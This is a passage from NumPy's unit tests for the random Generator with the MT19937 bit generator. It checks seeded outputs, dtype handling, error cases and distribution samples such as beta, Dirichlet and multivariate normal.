(2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673,
1831631863, 1215661561, 3869512430]))]
)
def test_repeatability_32bit_boundary(self, bound, expected):
for size in [None, len(expected)]:
random = Generator(MT19937(1234))
x = random.integers(bound, size=size)
assert_equal(x, expected if size is not None else expected[0])
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array([[[1622936284, 3620788691, 1659384060],
[1417365545, 760222891, 1909653332],
[3788118662, 660249498, 4092002593]],
[[3625610153, 2979601262, 3844162757],
[ 685800658, 120261497, 2694012896],
[1207779440, 1586594375, 3854335050]],
[[3004074748, 2310761796, 3012642217],
[2067714190, 2786677879, 1363865881],
[ 791663441, 1867303284, 2169727960]],
[[1939603804, 1250951100, 298950036],
[1040128489, 3791912209, 3317053765],
[3155528714, 61360675, 2305155588]],
[[ 817688762, 1335621943, 3288952434],
[1770890872, 1102951817, 1957607470],
[3099996017, 798043451, 48334215]]])
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345))
x = random.integers([[-1], [0], [1]],
[2**32 - 1, 2**32, 2**32 + 1],
size=size)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)),
np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0),
(-2**63-1, -2**63-1))}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low]*10])
high_a = np.array([high] * 10)
assert_raises(ValueError, random.integers, low, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_a,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_a, high_a,
endpoint=endpoint, dtype=dtype)
low_o = np.array([[low]*10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(ValueError, random.integers, low_o, high,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low, high_o,
endpoint=endpoint, dtype=dtype)
assert_raises(ValueError, random.integers, low_o, high_o,
endpoint=endpoint, dtype=dtype)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in NumPy arrays, `lbnd` is cast
# to np.int64 and `ubnd` is cast to np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when NumPy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented exactly in
# np.float64, causing it to be rounded down to
# np.iinfo(np.int64).max, leading to a ValueError because
# `lbnd` now equals the new `ubnd`.
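# (Editorial illustration, not from the original test: both bounds collapse
# to the same float64 value, e.g.
#     float(np.int64(2**63 - 1)) == float(np.uint64(2**63))  # -> True
# which is why a naive floating-point comparison wrongly reports
# `lbnd` >= `ubnd`.)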
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
def test_respect_dtype_singleton(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
for dt in (bool, int, np.compat.long):
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# gh-7284: Ensure that we get Python data types
sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert not hasattr(sample, 'dtype')
assert_equal(type(sample), dt)
def test_respect_dtype_array(self, endpoint):
# See gh-7203
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
dt = np.bool_ if dt is bool else dt
sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt)
assert_equal(sample.dtype, dt)
sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint,
dtype=dt)
assert_equal(sample.dtype, dt)
def test_zero_size(self, endpoint):
# See gh-7203
for dt in self.itype:
sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt)
assert sample.shape == (3, 0, 4)
assert sample.dtype == dt
assert self.rfunc(0, -10, 0, endpoint=endpoint,
dtype=dt).shape == (0,)
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape,
(3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
def test_error_byteorder(self):
other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4'
with pytest.raises(ValueError):
random.integers(0, 200, size=10, dtype=other_byteord_dt)
# chi2max is the maximum acceptable chi-squared value.
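# Each parametrized case draws `sample_size` values in [0, high) and compares
# the per-value counts against the uniform expectation, so the statistic has
# high - 1 degrees of freedom; the quoted p-values appear to be the
# approximate tail probabilities of exceeding chi2max under uniformity.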
@pytest.mark.slow
@pytest.mark.parametrize('sample_size,high,dtype,chi2max',
[(5000000, 5, np.int8, 125.0), # p-value ~4.6e-25
(5000000, 7, np.uint8, 150.0), # p-value ~7.7e-30
(10000000, 2500, np.int16, 3300.0), # p-value ~3.0e-25
(50000000, 5000, np.uint16, 6500.0), # p-value ~3.5e-25
])
def test_integers_small_dtype_chisquared(self, sample_size, high,
dtype, chi2max):
# Regression test for gh-14774.
samples = random.integers(high, size=sample_size, dtype=dtype)
values, counts = np.unique(samples, return_counts=True)
expected = sample_size / high
chi2 = ((counts - expected)**2 / expected).sum()
assert chi2 < chi2max
class TestRandomDist:
# Make sure the random distribution returns the correct value for a
# given seed
def setup(self):
self.seed = 1234567890
def test_integers(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2))
desired = np.array([[-80, -56], [41, 37], [-83, -16]])
assert_array_equal(actual, desired)
def test_integers_masked(self):
# Test the masked rejection sampling algorithm used to generate an array of
# uint32 values in an interval.
random = Generator(MT19937(self.seed))
actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
assert_array_equal(actual, desired)
def test_integers_closed(self):
random = Generator(MT19937(self.seed))
actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
desired = np.array([[-80, -56], [ 41, 38], [-83, -15]])
assert_array_equal(actual, desired)
def test_integers_max_int(self):
# Tests whether integers with endpoint=True can generate the
# maximum allowed Python int that can be converted
# into a C long. Previous implementations of this
# method have thrown an OverflowError when attempting
# to generate this integer.
actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
endpoint=True)
desired = np.iinfo('l').max
assert_equal(actual, desired)
def test_random(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.096999199829214, 0.707517457682192],
[0.084364834598269, 0.767731206553125],
[0.665069021359413, 0.715487190596693]])
assert_array_almost_equal(actual, desired, decimal=15)
random = Generator(MT19937(self.seed))
actual = random.random()
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_random_float(self):
random = Generator(MT19937(self.seed))
actual = random.random((3, 2))
desired = np.array([[0.0969992 , 0.70751746],
[0.08436483, 0.76773121],
[0.66506902, 0.71548719]])
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_float_scalar(self):
random = Generator(MT19937(self.seed))
actual = random.random(dtype=np.float32)
desired = 0.0969992
assert_array_almost_equal(actual, desired, decimal=7)
def test_random_unsupported_type(self):
assert_raises(TypeError, random.random, dtype='int32')
def test_choice_uniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4)
desired = np.array([0, 0, 2, 2], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_replace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
desired = np.array([0, 1, 0, 1], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_uniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False)
desired = np.array([2, 0, 3], dtype=np.int64)
assert_array_equal(actual, desired)
actual = random.choice(4, 4, replace=False, shuffle=False)
desired = np.arange(4, dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_nonuniform_noreplace(self):
random = Generator(MT19937(self.seed))
actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
desired = np.array([0, 2, 3], dtype=np.int64)
assert_array_equal(actual, desired)
def test_choice_noninteger(self):
random = Generator(MT19937(self.seed))
actual = random.choice(['a', 'b', 'c', 'd'], 4)
desired = np.array(['a', 'a', 'c', 'c'])
assert_array_equal(actual, desired)
def test_choice_multidimensional_default_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
desired = np.array([[0, 1], [0, 1], [4, 5]])
assert_array_equal(actual, desired)
def test_choice_multidimensional_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
desired = np.array([[0], [2], [4], [6]])
assert_array_equal(actual, desired)
def test_choice_exceptions(self):
sample = random.choice
assert_raises(ValueError, sample, -1, 3)
assert_raises(ValueError, sample, 3., 3)
assert_raises(ValueError, sample, [], 3)
assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
p=[[0.25, 0.25], [0.25, 0.25]])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
# gh-13087
assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
assert_raises(ValueError, sample, [1, 2, 3], 2,
replace=False, p=[1, 0, 0])
def test_choice_return_shape(self):
p = [0.1, 0.9]
# Check scalar
assert_(np.isscalar(random.choice(2, replace=True)))
assert_(np.isscalar(random.choice(2, replace=False)))
assert_(np.isscalar(random.choice(2, replace=True, p=p)))
assert_(np.isscalar(random.choice(2, replace=False, p=p)))
assert_(np.isscalar(random.choice([1, 2], replace=True)))
assert_(random.choice([None], replace=True) is None)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, replace=True) is a)
# Check 0-d array
s = tuple()
assert_(not np.isscalar(random.choice(2, s, replace=True)))
assert_(not np.isscalar(random.choice(2, s, replace=False)))
assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
assert_(random.choice([None], s, replace=True).ndim == 0)
a = np.array([1, 2])
arr = np.empty(1, dtype=object)
arr[0] = a
assert_(random.choice(arr, s, replace=True).item() is a)
# Check multi dimensional array
s = (2, 3)
p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
assert_equal(random.choice(6, s, replace=True).shape, s)
assert_equal(random.choice(6, s, replace=False).shape, s)
assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)
# Check zero-size
assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
assert_equal(random.integers(0, -10, size=0).shape, (0,))
assert_equal(random.integers(10, 10, size=0).shape, (0,))
assert_equal(random.choice(0, size=0).shape, (0,))
assert_equal(random.choice([], size=(0,)).shape, (0,))
assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
(3, 0, 4))
assert_raises(ValueError, random.choice, [], 10)
def test_choice_nan_probabilities(self):
a = np.array([42, 1, 2])
p = [None, None, None]
assert_raises(ValueError, random.choice, a, p=p)
def test_choice_p_non_contiguous(self):
p = np.ones(10) / 5
p[1::2] = 3.0
random = Generator(MT19937(self.seed))
non_contig = random.choice(5, 3, p=p[::2])
random = Generator(MT19937(self.seed))
contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
assert_array_equal(non_contig, contig)
def test_choice_return_type(self):
# gh-9867
p = np.ones(4) / 4.
actual = random.choice(4, 2)
assert actual.dtype == np.int64
actual = random.choice(4, 2, replace=False)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p)
assert actual.dtype == np.int64
actual = random.choice(4, 2, p=p, replace=False)
assert actual.dtype == np.int64
def test_choice_large_sample(self):
choice_hash = 'd44962a0b1e92f4a3373c23222244e21'
random = Generator(MT19937(self.seed))
actual = random.choice(10000, 5000, replace=False)
if sys.byteorder != 'little':
actual = actual.byteswap()
res = hashlib.md5(actual.view(np.int8)).hexdigest()
assert_(choice_hash == res)
def test_bytes(self):
random = Generator(MT19937(self.seed))
actual = random.bytes(10)
desired = b'\x86\xf0\xd4\x18\xe1\x81\t8%\xdd'
assert_equal(actual, desired)
def test_shuffle(self):
# Test lists, arrays (of various dtypes), and multidimensional versions
# of both, c-contiguous or not:
for conv in [lambda x: np.array([]),
lambda x: x,
lambda x: np.asarray(x).astype(np.int8),
lambda x: np.asarray(x).astype(np.float32),
lambda x: np.asarray(x).astype(np.complex64),
lambda x: np.asarray(x).astype(object),
lambda x: [(i, i) for i in x],
lambda x: np.asarray([[i, i] for i in x]),
lambda x: np.vstack([x, x]).T,
# gh-11442
lambda x: (np.asarray([(i, i) for i in x],
[("a", int), ("b", int)])
.view(np.recarray)),
# gh-4270
lambda x: np.asarray([(i, i) for i in x],
[("a", object, (1,)),
("b", np.int32, (1,))])]:
random = Generator(MT19937(self.seed))
alist = conv([1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
random.shuffle(alist)
actual = alist
desired = conv([4, 1, 9, 8, 0, 5, 3, 6, 2, 7])
assert_array_equal(actual, desired)
def test_shuffle_custom_axis(self):
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=1)
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = np.arange(16).reshape((4, 4))
random.shuffle(actual, axis=-1)
assert_array_equal(actual, desired)
def test_shuffle_axis_nonsquare(self):
y1 = np.arange(20).reshape(2, 10)
y2 = y1.copy()
random = Generator(MT19937(self.seed))
random.shuffle(y1, axis=1)
random = Generator(MT19937(self.seed))
random.shuffle(y2.T)
assert_array_equal(y1, y2)
def test_shuffle_masked(self):
# gh-3263
a = np.ma.masked_values(np.reshape(range(20), (5, 4)) % 3 - 1, -1)
b = np.ma.masked_values(np.arange(20) % 3 - 1, -1)
a_orig = a.copy()
b_orig = b.copy()
for i in range(50):
random.shuffle(a)
assert_equal(
sorted(a.data[~a.mask]), sorted(a_orig.data[~a_orig.mask]))
random.shuffle(b)
assert_equal(
sorted(b.data[~b.mask]), sorted(b_orig.data[~b_orig.mask]))
def test_shuffle_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.shuffle, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.shuffle, arr, 3)
assert_raises(TypeError, random.shuffle, arr, slice(1, 2, None))
arr = [[1, 2, 3], [4, 5, 6]]
assert_raises(NotImplementedError, random.shuffle, arr, 1)
def test_permutation(self):
random = Generator(MT19937(self.seed))
alist = [1, 2, 3, 4, 5, 6, 7, 8, 9, 0]
actual = random.permutation(alist)
desired = [4, 1, 9, 8, 0, 5, 3, 6, 2, 7]
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
arr_2d = np.atleast_2d([1, 2, 3, 4, 5, 6, 7, 8, 9, 0]).T
actual = random.permutation(arr_2d)
assert_array_equal(actual, np.atleast_2d(desired).T)
bad_x_str = "abcd"
assert_raises(np.AxisError, random.permutation, bad_x_str)
bad_x_float = 1.2
assert_raises(np.AxisError, random.permutation, bad_x_float)
random = Generator(MT19937(self.seed))
integer_val = 10
desired = [3, 0, 8, 7, 9, 4, 2, 5, 1, 6]
actual = random.permutation(integer_val)
assert_array_equal(actual, desired)
def test_permutation_custom_axis(self):
a = np.arange(16).reshape((4, 4))
desired = np.array([[ 0, 3, 1, 2],
[ 4, 7, 5, 6],
[ 8, 11, 9, 10],
[12, 15, 13, 14]])
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=1)
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.permutation(a, axis=-1)
assert_array_equal(actual, desired)
def test_permutation_exceptions(self):
random = Generator(MT19937(self.seed))
arr = np.arange(10)
assert_raises(np.AxisError, random.permutation, arr, 1)
arr = np.arange(9).reshape((3, 3))
assert_raises(np.AxisError, random.permutation, arr, 3)
assert_raises(TypeError, random.permutation, arr, slice(1, 2, None))
@pytest.mark.parametrize("dtype", [int, object])
@pytest.mark.parametrize("axis, expected",
[(None, np.array([[3, 7, 0, 9, 10, 11],
[8, 4, 2, 5, 1, 6]])),
(0, np.array([[6, 1, 2, 9, 10, 11],
[0, 7, 8, 3, 4, 5]])),
(1, np.array([[ 5, 3, 4, 0, 2, 1],
[11, 9, 10, 6, 8, 7]]))])
def test_permuted(self, dtype, axis, expected):
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
random.permuted(x, axis=axis, out=x)
assert_array_equal(x, expected)
random = Generator(MT19937(self.seed))
x = np.arange(12).reshape(2, 6).astype(dtype)
y = random.permuted(x, axis=axis)
assert y.dtype == dtype
assert_array_equal(y, expected)
def test_permuted_with_strides(self):
random = Generator(MT19937(self.seed))
x0 = np.arange(22).reshape(2, 11)
x1 = x0.copy()
x = x0[:, ::3]
y = random.permuted(x, axis=1, out=x)
expected = np.array([[0, 9, 3, 6],
[14, 20, 11, 17]])
assert_array_equal(y, expected)
x1[:, ::3] = expected
# Verify that the original x0 was modified in-place as expected.
assert_array_equal(x1, x0)
def test_permuted_empty(self):
y = random.permuted([])
assert_array_equal(y, [])
@pytest.mark.parametrize('outshape', [(2, 3), 5])
def test_permuted_out_with_wrong_shape(self, outshape):
a = np.array([1, 2, 3])
out = np.zeros(outshape, dtype=a.dtype)
with pytest.raises(ValueError, match='same shape'):
random.permuted(a, out=out)
def test_permuted_out_with_wrong_type(self):
out = np.zeros((3, 5), dtype=np.int32)
x = np.ones((3, 5))
with pytest.raises(TypeError, match='Cannot cast'):
random.permuted(x, axis=1, out=out)
def test_beta(self):
random = Generator(MT19937(self.seed))
actual = random.beta(.1, .9, size=(3, 2))
desired = np.array(
[[1.083029353267698e-10, 2.449965303168024e-11],
[2.397085162969853e-02, 3.590779671820755e-08],
[2.830254190078299e-04, 1.744709918330393e-01]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_binomial(self):
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456, size=(3, 2))
desired = np.array([[42, 41],
[42, 48],
[44, 50]])
assert_array_equal(actual, desired)
random = Generator(MT19937(self.seed))
actual = random.binomial(100.123, .456)
desired = 42
assert_array_equal(actual, desired)
def test_chisquare(self):
random = Generator(MT19937(self.seed))
actual = random.chisquare(50, size=(3, 2))
desired = np.array([[32.9850547060149, 39.0219480493301],
[56.2006134779419, 57.3474165711485],
[55.4243733880198, 55.4209797925213]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_dirichlet(self):
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha, size=(3, 2))
desired = np.array([[[0.5439892869558927, 0.45601071304410745],
[0.5588917345860708, 0.4411082654139292 ]],
[[0.5632074165063435, 0.43679258349365657],
[0.54862581112627, 0.45137418887373015]],
[[0.49961831357047226, 0.5003816864295278 ],
[0.52374806183482, 0.47625193816517997]]])
assert_array_almost_equal(actual, desired, decimal=15)
bad_alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, bad_alpha)
random = Generator(MT19937(self.seed))
alpha = np.array([51.72840233779265162, 39.74494232180943953])
actual = random.dirichlet(alpha)
assert_array_almost_equal(actual, desired[0, 0], decimal=15)
def test_dirichlet_size(self):
# gh-3173
p = np.array([51.72840233779265162, 39.74494232180943953])
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, np.uint32(1)).shape, (1, 2))
assert_equal(random.dirichlet(p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.dirichlet(p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.dirichlet, p, float(1))
def test_dirichlet_bad_alpha(self):
# gh-2089
alpha = np.array([5.4e-01, -1.0e-16])
assert_raises(ValueError, random.dirichlet, alpha)
# gh-15876
assert_raises(ValueError, random.dirichlet, [[5, 1]])
assert_raises(ValueError, random.dirichlet, [[5], [1]])
assert_raises(ValueError, random.dirichlet, [[[5], [1]], [[1], [5]]])
assert_raises(ValueError, random.dirichlet, np.array([[5, 1], [1, 5]]))
def test_dirichlet_alpha_non_contiguous(self):
a = np.array([51.72840233779265162, -1.0, 39.74494232180943953])
alpha = a[::2]
random = Generator(MT19937(self.seed))
non_contig = random.dirichlet(alpha, size=(3, 2))
random = Generator(MT19937(self.seed))
contig = random.dirichlet(np.ascontiguousarray(alpha),
size=(3, 2))
assert_array_almost_equal(non_contig, contig)
def test_dirichlet_small_alpha(self):
eps = 1.0e-9 # 1.0e-10 -> runtime x 10; 1e-11 -> runtime x 200, etc.
alpha = eps * np.array([1., 1.0e-3])
random = Generator(MT19937(self.seed))
actual = random.dirichlet(alpha, size=(3, 2))
expected = np.array([
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]],
[[1., 0.],
[1., 0.]]
])
assert_array_almost_equal(actual, expected, decimal=15)
@pytest.mark.slow
def test_dirichlet_moderately_small_alpha(self):
# Use alpha.max() < 0.1 to trigger stick breaking code path
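# (Editorial note: for such small concentration parameters the gamma-based
# Dirichlet sampler is prone to numerical problems, so the implementation is
# expected to fall back to the beta "stick breaking" construction exercised
# here; only the sample mean is checked.)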
alpha = np.array([0.02, 0.04, 0.03])
exact_mean = alpha / alpha.sum()
random = Generator(MT19937(self.seed))
sample = random.dirichlet(alpha, size=20000000)
sample_mean = sample.mean(axis=0)
assert_allclose(sample_mean, exact_mean, rtol=1e-3)
def test_exponential(self):
random = Generator(MT19937(self.seed))
actual = random.exponential(1.1234, size=(3, 2))
desired = np.array([[0.098845481066258, 1.560752510746964],
[0.075730916041636, 1.769098974710777],
[1.488602544592235, 2.49684815275751 ]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_exponential_0(self):
assert_equal(random.exponential(scale=0), 0)
assert_raises(ValueError, random.exponential, scale=-0.)
def test_f(self):
random = Generator(MT19937(self.seed))
actual = random.f(12, 77, size=(3, 2))
desired = np.array([[0.461720027077085, 1.100441958872451],
[1.100337455217484, 0.91421736740018 ],
[0.500811891303113, 0.826802454552058]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gamma(self):
random = Generator(MT19937(self.seed))
actual = random.gamma(5, 3, size=(3, 2))
desired = np.array([[ 5.03850858902096, 7.9228656732049 ],
[18.73983605132985, 19.57961681699238],
[18.17897755150825, 18.17653912505234]])
assert_array_almost_equal(actual, desired, decimal=14)
def test_gamma_0(self):
assert_equal(random.gamma(shape=0, scale=0), 0)
assert_raises(ValueError, random.gamma, shape=-0., scale=-0.)
def test_geometric(self):
random = Generator(MT19937(self.seed))
actual = random.geometric(.123456789, size=(3, 2))
desired = np.array([[ 1, 10],
[ 1, 12],
[ 9, 10]])
assert_array_equal(actual, desired)
def test_geometric_exceptions(self):
assert_raises(ValueError, random.geometric, 1.1)
assert_raises(ValueError, random.geometric, [1.1] * 10)
assert_raises(ValueError, random.geometric, -0.1)
assert_raises(ValueError, random.geometric, [-0.1] * 10)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.geometric, np.nan)
assert_raises(ValueError, random.geometric, [np.nan] * 10)
def test_gumbel(self):
random = Generator(MT19937(self.seed))
actual = random.gumbel(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[ 4.688397515056245, -0.289514845417841],
[ 4.981176042584683, -0.633224272589149],
[-0.055915275687488, -0.333962478257953]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_gumbel_0(self):
assert_equal(random.gumbel(scale=0), 0)
assert_raises(ValueError, random.gumbel, scale=-0.)
def test_hypergeometric(self):
random = Generator(MT19937(self.seed))
actual = random.hypergeometric(10.1, 5.5, 14, size=(3, 2))
desired = np.array([[ 9, 9],
[ 9, 9],
[10, 9]])
assert_array_equal(actual, desired)
# Test nbad = 0
actual = random.hypergeometric(5, 0, 3, size=4)
desired = np.array([3, 3, 3, 3])
assert_array_equal(actual, desired)
actual = random.hypergeometric(15, 0, 12, size=4)
desired = np.array([12, 12, 12, 12])
assert_array_equal(actual, desired)
# Test ngood = 0
actual = random.hypergeometric(0, 5, 3, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
actual = random.hypergeometric(0, 15, 12, size=4)
desired = np.array([0, 0, 0, 0])
assert_array_equal(actual, desired)
def test_laplace(self):
random = Generator(MT19937(self.seed))
actual = random.laplace(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-3.156353949272393, 1.195863024830054],
[-3.435458081645966, 1.656882398925444],
[ 0.924824032467446, 1.251116432209336]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_laplace_0(self):
assert_equal(random.laplace(scale=0), 0)
assert_raises(ValueError, random.laplace, scale=-0.)
def test_logistic(self):
random = Generator(MT19937(self.seed))
actual = random.logistic(loc=.123456789, scale=2.0, size=(3, 2))
desired = np.array([[-4.338584631510999, 1.890171436749954],
[-4.64547787337966 , 2.514545562919217],
[ 1.495389489198666, 1.967827627577474]])
assert_array_almost_equal(actual, desired, decimal=15)
def test_lognormal(self):
random = Generator(MT19937(self.seed))
actual = random.lognormal(mean=.123456789, sigma=2.0, size=(3, 2))
desired = np.array([[ 0.0268252166335, 13.9534486483053],
[ 0.1204014788936, 2.2422077497792],
[ 4.2484199496128, 12.0093343977523]])
assert_array_almost_equal(actual, desired, decimal=13)
def test_lognormal_0(self):
assert_equal(random.lognormal(sigma=0), 1)
assert_raises(ValueError, random.lognormal, sigma=-0.)
def test_logseries(self):
random = Generator(MT19937(self.seed))
actual = random.logseries(p=.923456789, size=(3, 2))
desired = np.array([[14, 17],
[3, 18],
[5, 1]])
assert_array_equal(actual, desired)
def test_logseries_exceptions(self):
with np.errstate(invalid='ignore'):
assert_raises(ValueError, random.logseries, np.nan)
assert_raises(ValueError, random.logseries, [np.nan] * 10)
def test_multinomial(self):
random = Generator(MT19937(self.seed))
actual = random.multinomial(20, [1 / 6.] * 6, size=(3, 2))
desired = np.array([[[1, 5, 1, 6, 4, 3],
[4, 2, 6, 2, 4, 2]],
[[5, 3, 2, 6, 3, 1],
[4, 4, 0, 2, 3, 7]],
[[6, 3, 1, 5, 3, 2],
[5, 5, 3, 1, 2, 4]]])
assert_array_equal(actual, desired)
@pytest.mark.parametrize("method", ["svd", "eigh", "cholesky"])
def test_multivariate_normal(self, method):
random = Generator(MT19937(self.seed))
mean = (.123456789, 10)
cov = [[1, 0], [0, 1]]
size = (3, 2)
actual = random.multivariate_normal(mean, cov, size, method=method)
desired = np.array([[[-1.747478062846581, 11.25613495182354 ],
[-0.9967333370066214, 10.342002097029821 ]],
[[ 0.7850019631242964, 11.181113712443013 ],
[ 0.8901349653255224, 8.873825399642492 ]],
[[ 0.7130260107430003, 9.551628690083056 ],
[ 0.7127098726541128, 11.991709234143173 ]]])
assert_array_almost_equal(actual, desired, decimal=15)
# Check the default size; this used to raise a deprecation warning
actual = random.multivariate_normal(mean, cov, method=method)
desired = np.array([0.233278563284287, 9.424140804347195])
assert_array_almost_equal(actual, desired, decimal=15)
# Check that a non-symmetric covariance input raises an exception
# when check_valid='raise' with the default svd method.
mean = [0, 0]
cov = [[1, 2], [1, 2]]
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
# Check that a non-positive-semidefinite covariance matrix warns with
# RuntimeWarning
cov = [[1, 2], [2, 1]]
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov)
assert_warns(RuntimeWarning, random.multivariate_normal, mean, cov,
method='eigh')
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
method='cholesky')
# and that it doesn't emit a RuntimeWarning when check_valid='ignore'
assert_no_warnings(random.multivariate_normal, mean, cov,
check_valid='ignore')
# and that it raises a ValueError when check_valid='raise'
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise')
assert_raises(ValueError, random.multivariate_normal, mean, cov,
check_valid='raise', method='eigh')
# check degenerate samples from singular covariance matrix
cov = [[1, 1], [1, 1]]
if method in ('svd', 'eigh'):
samples = random.multivariate_normal(mean, cov, size=(3, 2),
method=method)
assert_array_almost_equal(samples[..., 0], samples[..., 1],
decimal=6)
else:
assert_raises(LinAlgError, random.multivariate_normal, mean, cov,
